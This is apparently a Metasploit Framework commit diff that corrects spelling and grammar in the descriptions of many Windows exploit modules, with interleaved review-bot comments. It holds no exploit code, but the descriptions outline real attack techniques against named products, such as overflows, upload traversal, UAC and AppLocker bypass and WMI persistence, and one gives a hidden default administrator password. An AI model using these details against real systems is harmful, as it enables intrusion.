@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments - the the destination pointer. If an ascii digit [0-9] is encountered, the + the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 4751f4b74e..a2c328e275 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, + When an overly long FTP server response is received by a client, arbitrary code may be executed. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index d87637f8dd..17278ba87a 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + long JSESSION cookie value can lead to arbitrary code execution. }, 'Author' => 'pusscat', 'References' => 
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index dfe079ce46..33b54389da 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP AutoPass License Server. It abuses two weaknesses in order to get its objective. First, the AutoPass application doesn't enforce - authentication in the CommunicationServlet component. Seond, it's possible to abuse a + authentication in the CommunicationServlet component. Second, it's possible to abuse a directory traversal when uploading files thorough the same component, allowing to upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50. diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index c5fe0e7c3e..549a377fdb 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated - file uploads and handling zip contents in a insecure way. Combining both weaknesses + file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 
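Review bot: The context line directly after the corrected `Second, it's possible to abuse a` line still has the typo `uploading files thorough the same component`, and the following clause `allowing to upload` has no subject. Suggest `directory traversal when uploading files through the same component, allowing an attacker` and `to upload an arbitrary payload embedded in a JSP.` for those two lines so the commit's typo sweep does not stop one line short. The hp_imc_mibfileupload hunk on this line is fine as changed. Text inside `%q{}` only; the `update_info` hash starts and ends outside the hunk.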
diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index e13fea3d96..4025f63965 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" - The vulnerability is related to "_WebSession::GetWebLocale()" .. + The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 898d0ca5e7..a9a0fc253c 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote address. The vulnerability is due to the use of the function "_OVConcatPath" which finally - uses "strcat" in a insecure way. User controlled data is concatenated to a string + uses "strcat" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index ddfbf25392..9fd6a6cd2d 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb 
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined - with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is + with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 286bec091c..62ba2f732b 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. - The vulnerable code lies within the a function within "snmpviewer.exe" with a + The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 6839e47c99..97080de852 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works - against a specific build (ie. NNM 7.53_01195) + against a specific build (i.e. NNM 7.53_01195) }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index ee3b876650..f357451095 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the - request size. The buffer being targetted is 16384 bytes in size. There are actually two + request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 8533e86032..175c790ec0 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb 
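Review bot: The unchanged context above the `i.e.` fix in hp_nnm_toolbar_02 drops a word: `By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe` should read `with a specially crafted OvOSLocale cookie`, matching the phrasing used in the other HP NNM descriptions touched by this commit. Since the hunk is already editing this description, fixing it here keeps the sweep consistent. Display text only; the surrounding `update_info` call begins and ends outside the hunk.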
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. - By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow + By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote like the following: #0 ... - #1 sprintf_new(local_stack_buf, fmt, cooke); + #1 sprintf_new(local_stack_buf, fmt, cookie); #2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0("nnm", "webappmon"); @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being - passed in a request ot "webappmon.exe". Further research shows that several different + passed in a request to "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 9760118941..63d1a92528 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb 
@@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the - com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system - allowing the execution of arbitary code. + com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system + allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 }, diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index b509c49c96..24f401dc26 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), - which may result aribitrary remote code execution under the context of 'SYSTEM'. + which may result in arbitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 645794b5c6..746a121ef7 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX HTTP server. - By sending an specially crafted HTTP request containing format specifiers, an + By sending a specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index bc3ba93485..f66d395af2 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow - attack. By sending an long character string in the password field, both the structured + attack. By sending a long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 2b08f0b2f8..f7c5ee3a5d 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak ', diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index fa47aa5c65..ba31ebb651 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account - has a default password of "plugin" which can not be reset through the user interface. By + has a default password of "plugin" which cannot be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows. diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index 76bd9fdf3e..fbfbf9858a 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb 
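Review bot: In the manage_engine_opmanager_rce hunk the line immediately after the `cannot` fix still reads `By log-in and abusing the default administrator's SQL query functionality`, which is ungrammatical; `By logging in and abusing the default administrator's SQL query functionality` matches the rest of the paragraph. The sentence before it, documenting a hidden `IntegrationUser` account with a fixed password that cannot be reset through the UI, is the key exposure detail defenders rely on, so keeping this paragraph clean is worthwhile. Text inside `%q{}` only; `update_info` starts and ends outside the hunk.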
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', 'Description' => %q{ - This module logs into the Manage Engine Appplications Manager to upload a + This module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes the payload. }, 'Author' => 'Jacob Giannantonio ', 'Platform' => 'win', diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb index e95b94becf..bba2efb29f 100644 --- a/modules/exploits/windows/http/octopusdeploy_deploy.rb +++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Octopus Deploy Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on an Octopus Deploy server given - valid credentials or an API key. The payload is execued as a powershell script step + valid credentials or an API key. The payload is executed as a powershell script step on the Octopus Deploy server during a deployment. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 97eb75ca15..01c368907f 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb 
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
 root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code.
- Both techniques has been successfully tested on default installs of Oracle BTM
+ Both techniques have been successfully tested on default installs of Oracle BTM
 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option. },
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index ab0e9270ce..b99da301e1 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ This module exploits an authentication bypass vulnerability
- in login.php. In conjuction with the authentication bypass issue,
+ in login.php. In conjunction with the authentication bypass issue,
 the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0
diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb
index 7adce23a2f..9225f81aea 100644
--- a/modules/exploits/windows/http/savant_31_overflow.rb
+++ b/modules/exploits/windows/http/savant_31_overflow.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{ This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt
- generally causes a thread to die whether sucessful or not. Therefore, in a default
+ generally causes a thread to die whether successful or not. Therefore, in a default
 configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the
diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb
index ca29fef445..a0c48c7bd0 100644
--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{ This module can be used to execute a payload on Umbraco CMS 4.7.0.378. The payload is uploaded as an ASPX script by sending a specially crafted
- SOAP request to codeEditorSave.asmx, which permits unauthorised file upload
+ SOAP request to codeEditorSave.asmx, which permits unauthorized file upload
 via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory.
diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb
index 972f64f4c3..57e7ed96e9 100644
--- a/modules/exploits/windows/iis/ms02_018_htr.rb
+++ b/modules/exploits/windows/iis/ms02_018_htr.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{ This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against
- Windows NT 4 Service Packs 3, 4, and 5. The server will
+ Windows NT 4 Service Packs 3, 4, and 5. The server will
 continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have
diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb
index 1c9e9173d9..99719ef8e1 100644
--- a/modules/exploits/windows/imap/imail_delete.rb
+++ b/modules/exploits/windows/imap/imail_delete.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE'
- command of the the IMail IMAP4D service. This vulnerability
+ command of the IMail IMAP4D service. This vulnerability
 can only be exploited with a valid username and password. This flaw was patched in version 8.14. },
diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb
index ec6af0305e..e5a7a49317 100644
--- a/modules/exploits/windows/imap/novell_netmail_status.rb
+++ b/modules/exploits/windows/imap/novell_netmail_status.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'Novell NetMail IMAP STATUS Buffer Overflow', 'Description' => %q{
- This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS
+ This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS
 verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. },
diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb
index bc7c633104..48533a760f 100644
--- a/modules/exploits/windows/license/calicclnt_getconfig.rb
+++ b/modules/exploits/windows/license/calicclnt_getconfig.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{
- This module exploits an vulnerability in the CA License Client
+ This module exploits a vulnerability in the CA License Client
 service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service
diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb
index facf89531c..4665dd436d 100644
--- a/modules/exploits/windows/local/applocker_bypass.rb
+++ b/modules/exploits/windows/local/applocker_bypass.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Local
 super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{
- This module will generate a .NET service executable on the target and utilise
+ This module will generate a .NET service executable on the target and utilize
 InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be
diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
index 442c7cfc5e..42dd874d1f 100644
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -22,11 +22,11 @@ class MetasploitModule < Msf::Exploit::Local
 This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection
- technique to drop only the DLL payload binary instead of three seperate
+ technique to drop only the DLL payload binary instead of three separate
 binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting
- your payload in a seperate process.
+ your payload in a separate process.
 }, 'License' => MSF_LICENSE, 'Author' => [
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 42fbe5dfd3..f195409a4f 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local
 'Name' => 'Windows SYSTEM Escalation via KiTrap0D', 'Description' => %q{ This module will create a new session with SYSTEM privileges via the
- KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already
+ KiTrap0D exploit by Tavis Ormandy. If the session in use is already
 elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. },
diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
index 33e7621dab..04c5b66dd2 100644
--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
 with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload
- into another SYSTEM process before restoring it's own token to
+ into another SYSTEM process before restoring its own token to
 avoid causing system instability. ), 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
index d57baf0588..e56aac1e70 100644
--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@@ -35,8 +35,8 @@ class MetasploitModule < Msf::Exploit::Local
 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
- a malformed font. The vulnerability was exploited by the hacking team and disclosed on
- the july data leak. This module has been tested successfully on vulnerable builds of
+ a malformed font. The vulnerability was exploited by the hacking team and disclosed in
+ the July data leak. This module has been tested successfully on vulnerable builds of
 Windows 8.1 x64. }, 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/local/ms16_016_webdav.rb b/modules/exploits/windows/local/ms16_016_webdav.rb
index c9db432e06..2eca69259a 100644
--- a/modules/exploits/windows/local/ms16_016_webdav.rb
+++ b/modules/exploits/windows/local/ms16_016_webdav.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local
 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation', 'Description' => %q{ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
- a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
+ a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing
 the specified payload within the context of the elevated process. }, 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb
index bb3bb2c098..02af138582 100644
--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local
 Vulnerable Products: Panda Global Protection 2016 (<=16.1.2) Panda Antivirus Pro 2016 (<=16.1.2)
- Panda Small Busines Protetion (<=16.1.2)
+ Panda Small Business Protection (<=16.1.2)
 Panda Internet Security 2016 (<=16.1.2) }, 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb
index a590cf92b9..f920dd58c1 100644
--- a/modules/exploits/windows/local/run_as.rb
+++ b/modules/exploits/windows/local/run_as.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local
 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default.
- Unless targetting a local user either set the DOMAIN, or specify a UPN user
+ Unless targeting a local user either set the DOMAIN, or specify a UPN user
 format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable.
diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
index 4879a2fcd6..e3ff6051ab 100644
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
 vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been
- tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
+ tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
 }, 'License' => MSF_LICENSE, 'Author' =>
diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb
index bcb068b3c3..bf28f0ed4f 100644
--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Local
 The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method
- creates an event filter that utilises the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER
- before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command
+ creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER
+ before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command
 (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.
diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb
index c1dd455671..3ff96f380f 100644
--- a/modules/exploits/windows/lpd/wincomlpd_admin.rb
+++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{ This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote
- adminstration service, an attacker may be able to execute arbitrary
+ administration service, an attacker may be able to execute arbitrary
 code. }, 'Author' => 'MC',
diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb
index 60cf970353..e38ec9cb95 100644
--- a/modules/exploits/windows/misc/allmediaserver_bof.rb
+++ b/modules/exploits/windows/misc/allmediaserver_bof.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't
- reliable across virtual (VMWare, VirtualBox) and physical environments. Because of
+ reliable across virtual (VMWare, VirtualBox) and physical environments. Because of
 this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP. },
diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
index f9896581b1..479d87bde5 100644
--- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
+++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
